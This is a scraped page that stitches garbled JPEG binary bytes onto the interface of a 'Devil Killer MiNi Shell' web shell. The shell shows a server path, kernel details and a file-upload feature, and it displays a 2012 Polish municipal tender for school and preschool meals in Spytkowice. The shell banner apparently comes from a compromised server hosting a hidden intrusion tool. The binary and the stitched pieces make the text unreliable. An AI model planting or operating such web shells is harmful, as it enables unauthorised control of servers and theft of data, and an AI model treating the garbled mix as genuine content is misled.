JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121219/519958-N-2012.html

<p class="kh_header"><b>Spytkowice: Świadczenie usługi dożywiania dzieci i młodzieży w placówkach szkolnych w okresie : od 02.01.201r. do 31.12.2013r.</b><br>
<b>Numer ogłoszenia: 519958 - 2012; data zamieszczenia: 19.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Spytkowice , Spytkowice 26, 34-745 Spytkowice, woj. małopolskie, tel. 018 2688370, faks 018 2688961.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spytkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi dożywiania dzieci i młodzieży w placówkach szkolnych w okresie : od 02.01.201r. do 31.12.2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I:
Nazwa nadania zamówienia przez zamawiającego : Przedmiotem zamówienia jest świadczenie usługi dożywiania dzieci i młodzieży w placówkach szkolnych w dni trwania nauki na terenie Gminy Spytkowice w okresie : od 2.01.2013r. do 31.12.2013r. na podstawie art. 48 ust.5 ustawy       z dnia 12 marca 2004r. o pomocy społecznej ( tj. Dz. U. z 2009r. Nr 175, poz.1362 z pózn. zm), ustawy z dnia 29 grudnia 2005r. o ustanowieniu programu wieloletniego -Pomoc państwa              w zakresie dożywiania ( Dz. U. z 2005r. Nr 267, poz.2259 z pózn. zm.) oraz rozporządzenia Rady Ministrów z dnia 7 lutego 2006r. w sprawie realizacji programu wieloletniego - Pomoc państwa      w zakresie dożywiania (Dz. U. z 2006r. Nr 25, poz.186).

Placówki szkolne:
1.	Gimnazjum im. Wawrzyńca Spytka Jordana przy Zespole Szkół Podstawowo - Gimnazjalnych w Spytkowicach, 34-745 Spytkowice 12.
2.	Szkoła Podstawowa Nr 1 im. Porucznika Tadeusza Stefaniszyna przy Zespole Szkół Podstawowo - Gimnazjalnych w Spytkowicach, 34-745 Spytkowice 12.
3.	Szkoła Podstawowa Nr 2 im. 12 Pułku Piechoty w Spytkowicach, 34-745 Spytkowice 566.
4.	Szkoła Podstawowa Nr 3 im. Ojca Św. Jana Pawła II w Spytkowicach, 34-745 Spytkowice 153.

Usługa polega na przygotowaniu,  dostarczeniu i wydaniu  gorącego posiłku uczniom w miejscu       i w czasie wskazanym przez dyrektorów poniższych  placówek szkolnych znajdujących się na terenie Gminy Spytkowice powiatu nowotarskiego. 

Łączna szacunkowa liczba obiadów w okresie trwania umowy tj. od dnia 2.01.2013r. do dnia 31.12.2013r. wynosi : 60 uczniów x 185 dni = 11100 obiadów.  Usługa będzie realizowana              w powyższym okresie od poniedziałku do piątku w dni trwania nauki szkolnej w wymienionych placówkach szkolnych z wyłączeniem przerw w nauce ( m.in.  ferie zimowe, przerwy świąteczne, przerwa wakacyjna, ustawowe dni wolne od nauki oraz wynikające z programu nauczania w danej  placówce szkolnej). Zarówno podana ilość uczniów jak i dni nauki jest szacunkowa, a co za tym idzie ilość przewidywanych obiadów może ulec zmianie. Cena posiłku wyczerpuje wszelkie roszczenia Wykonawcy z tytułu wykonywania usługi.  
   
Szczegółowe wymagania dotyczące posiłków. 

Posiłek jest to gorący obiad w formie drugiego dania, winien składać się z produktów białkowych  głównie pochodzenia zwierzęcego (mięso, ryby, drób, ser, jaja ), produktów bogatych                     w węglowodany złożone ( ziemniaki, kasza, kluski ) oraz warzyw ( warzywa gotowane, surówki). 

Ustala się minimalną gramaturę w  przykładowych posiłkach : 
	pierś panierowana - co najmniej 150 gram,
	udko kurczaka - co najmniej 120 gram, 
	schab panierowany- co najmniej 120 gram, 
	kotlet mielony - co najmniej 150 gram,  
	pieczeń wieprzowa  - co najmniej 150 gram, 
	wątróbka- co najmniej 150 gram, 
	gulasz wołowy, wieprzowy (zamiennie) - co najmniej 120 gram, 
	ryba smażona - co najmniej 120 gram, 
	jajko sadzone, gotowane , kotlet z jajka - co najmniej 100 gram, 
	krokiet z mięsem - co najmniej 270 gram, 
	pierogi z mięsem, z owocami, z serem (zamiennie)  - co najmniej 300 gram, 
	placki ziemniaczane - co najmniej 280 gram, 
	fasolka po bretońsku - co najmniej 340 gram, 
	bigos - co najmniej 315 gram, 
	gołąbki - co najmniej 300 gram, 
	makaron/ ryż z bitą śmietaną i owocami  (zamiennie)  co najmniej 360 gram, 
	naleśniki z serem co najmniej 300 gram, 
	kasza, makaron, ryż na sypko gotowany, kluski śląskie, ziemniaki, puree (zamiennie)             co najmniej 100 gram, 
	surówka warzywna - co najmniej 100 gram, 

Posiłki muszą być przygotowywane jak również dostarczone do placówek szkolnych                        z zachowaniem wszelkich wymogów sanitarno - higienicznych dla żywienia zbiorowego. Przygotowywanie ze szczególną dbałością o wartość odżywczą  jak i kaloryczną dostosowaną       do potrzeb dzieci i młodzieży szkolnej. W tygodniowym jadłospisie powinny znajdować się zarówno dania mięsne, rybne oraz mączne, z uwzględnieniem warzyw.
Posiłki dostarczane będą przez Wykonawcę własnym transportem z zachowaniem wymogów sanitarnych oraz innych określonych prawem. Posiłki dostarczone będę w formie umożliwiającej ich bezpośrednie wydanie  uczniom, w postaci  gorącego dania. Wykonawca zapewnia zastawą stołową (talerze, sztuce), lub też opakowania jednorazowe. Posiłki dostarczane będą do szkół          w godz. 10.00 - 13.00 po uprzednim uzyskaniu akceptacji ( co do miejsca dostarczenia posiłku        i czasu) dyrektorów placówek szkolnych, w których jest wykonywana usługa. Wykonawca        każdorazowo przed rozpoczynającym się okresem żywieniowym przedstawi zarówno Dyrektorom   Szkół jak i Kierownikowi Gminnego Ośrodka Pomocy Społecznej w Spytkowicach jadłospis przewidziany na dany okres żywieniowy z odpowiednim wyprzedzeniem, umożliwiającym wprowadzenie zmian  w jadłospisie zgodnie z zaleceniami ww.  
Zamawiający zapłaci za ilość faktycznie wydanych posiłków, potwierdzoną każdorazowo przez Dyrektorów placówek w których wykonywana jest usługa.
Wykonawca powinien ując w cenie ryzyko związane z ze zmienną ilością dożywianych uczniów zależną od frekwencji jak i ilością dni nauki w okresie od 2.01.2013r. do 31.12.2013r. Cena posiłku wyczerpuje wszelkie roszczenia Wykonawcy z tytułu wykonywania usługi.  


Część II:

Nazwa nadania zamówienia przez zamawiającego :  Przedmiotem zamówienia jest świadczenie usługi dożywiania dzieci w placówce przedszkolnej w dni jej funkcjonowania tj. trwania zajęć na terenie placówki  w okresie : od 2.01.2013r. do 31.12.2013r. na podstawie art. 48 ust.5 ustawy          z dnia 12 marca 2004r. o pomocy społecznej ( tj. Dz. U. z 2009r. Nr 175, poz.1362 z pózn. zm.), ustawy z dnia 29 grudnia 2005r. o ustanowieniu programu wieloletniego -Pomoc państwa              w zakresie dożywiania ( Dz. U. z 2005r. Nr 267, poz.2259 z pózn. zm.) oraz rozporządzenia Rady Ministrów z dnia 7 lutego 2006r. w sprawie realizacji programu wieloletniego -Pomoc państwa      w zakresie dożywiania- (Dz. U. z 2006r. Nr 25, poz.186).

Placówka przedszkolna : 
5.	Gminne Przedszkole Stokrotka w Spytkowicach  , 34-745 Spytkowice 29.

Usługa polega na przygotowaniu i wydaniu  gorącego posiłku w formie dwudaniowej wraz             z kompotem dzieciom uczęszczającym do ww. placówki przedszkolnej w  miejscu i w czasie wskazanym przez dyrektora placówki. 
 
Łączna szacunkowa liczba obiadów w okresie trwania umowy tj. od dnia 2.01.2013r. do dnia 31.12.2013r. wynosi : 10 dzieci x 235 dni = 2350 obiadów. Usługa będzie realizowana                    w powyższym okresie od poniedziałku do piątku w dni  funkcjonowania placówki tj. w czasie trwania zajęć na terenie placówki z wyłączeniem przerw w zajęciach ( m.in.  ferie zimowe, przerwy świąteczne, przerwa wakacyjna, ustawowe dni wolne oraz wynikające z programu funkcjonowania placówki przedszkolnej). Zarówno podana ilość dzieci  jak i dni trwania zajęć  jest szacunkowa,       a co za tym idzie ilość przewidywanych obiadów może ulec zmianie. Cena posiłku wyczerpuje wszelkie roszczenia Wykonawcy z tytułu wykonywania usługi.  
   
Szczegółowe wymagania dotyczące posiłków. 
Posiłek jest to gorący obiad w formie dwudaniowej, winien składać się z produktów białkowych  głównie pochodzenia zwierzęcego (mięso, ryby, drób, ser, jaja ), produktów bogatych                     w węglowodany złożone ( ziemniaki, kasza, kluski ) oraz warzyw ( warzywa gotowane, surówki). 

Ustala się minimalną gramaturę w  przykładowych posiłkach : 
	pierś panierowana - co najmniej 150 gram,
	udko kurczaka - co najmniej 120 gram, 
	schab panierowany- co najmniej 120 gram, 
	kotlet mielony - co najmniej 150 gram,  
	pieczeń wieprzowa  - co najmniej 150 gram, 
	wątróbka- co najmniej 150 gram, 
	gulasz wołowy,  wieprzowy (zamiennie) - co najmniej 120 gram, 
	ryba smażona - co najmniej 120 gram, 
	jajko sadzone, gotowane , kotlet z jajka - co najmniej 100 gram, 
	krokiet z mięsem - co najmniej 270 gram, 
	pierogi z mięsem, z owocami, z serem (zamiennie)  - co najmniej 300 gram, 
	placki ziemniaczane - co najmniej 280 gram, 
	fasolka po bretońsku - co najmniej 340 gram, 
	bigos - co najmniej 315 gram, 
	gołąbki - co najmniej 300 gram, 
	makaron, ryż z bitą śmietaną i owocami  (zamiennie) - co najmniej 360 gram, 
 	naleśniki z serem - co najmniej 300 gram, 
	kasza, makaron, ryż na sypko gotowany, kluski śląskie, ziemniaki, puree (zamiennie) -              co najmniej 100 gram, 
	surówka warzywna - co najmniej 100 gram, 
	porcja zupy -  co najmniej 250 gram. 
	kompot owocowy  -  co najmniej 200 gram. 
Posiłki muszą być przygotowywane lub dostarczone do placówki przedszkolnej, a następnie wydane  z zachowaniem wszelkich wymogów sanitarno - higienicznych dla żywienia zbiorowego. Przygotowywanie ze szczególną dbałością o wartość odżywczą  jak i kaloryczną dostosowaną       do potrzeb dzieci  w wieku przedszkolnym. Przygotowywane posiłki pod względem jakości
i technologii winny spełniać normy określone przez Instytut Żywności i Żywienia. W tygodniowym jadłospisie powinny znajdować się zarówno dania mięsne, rybne oraz mączne, z uwzględnieniem warzyw. 
Posiłki będą przygotowywane na miejscu lub dostarczane przez Wykonawcę własnym transportem z zachowaniem wymogów sanitarnych oraz innych określonych prawem w formie umożliwiającej ich bezpośrednie wydanie dzieciom, w postaci  gorącego dania. Wykonawca zapewnia zastawę stołową (talerze, sztuce, kubki itp.) lub opakowania jednorazowe. 
Posiłki dostarczane jaki wydawane będą w czasie i w miejscu wskazanym przez dyrektora placówki przedszkolnej. Wykonawca każdorazowo przed rozpoczynającym się okresem żywieniowym przedstawi zarówno Dyrektorowi Przedszkola jak i Kierownikowi Gminnego Ośrodka Pomocy Społecznej w Spytkowicach jadłospis przewidziany dany okres z odpowiednim wyprzedzeniem, umożliwiającym wprowadzenie zmian  w jadłospisie zgodnie z zaleceniami ww.  
Zamawiający zapłaci tylko za ilość faktycznie wydanych posiłków, potwierdzoną każdorazowo przez Dyrektora Przedszkola w której wykonywana będzie usługa. 
Wykonawca powinien ująć w cenie ryzyko związane ze zmienną ilością dożywianych dzieci zależnej od frekwencji  jak  również ilości dni dożywiania w okresie od 2.01.2013r. do 31.12.2013r. (tj. prowadzonego dożywiania ), co uzależnione jest od harmonogramu pracy ww. placówki tj. dni w których dzieci będą planowo przebywały na terenie placówki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spytkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Spytkowice
34-745 Spytkowice 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2012 godzina 10:00, miejsce: Urząd Gminy Spytkowice
34-745 Spytkowice 26
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dożywianie dzieci i młodzieży w szkołach oraz gimnazjum..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łączna szacunkowa liczba obiadów w okresie trwania umowy - 11100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dozywianie dzieci w placówce przedszkolnej w Spytkowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łączna szacunkowa liczba obiadów wynosi 2350..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com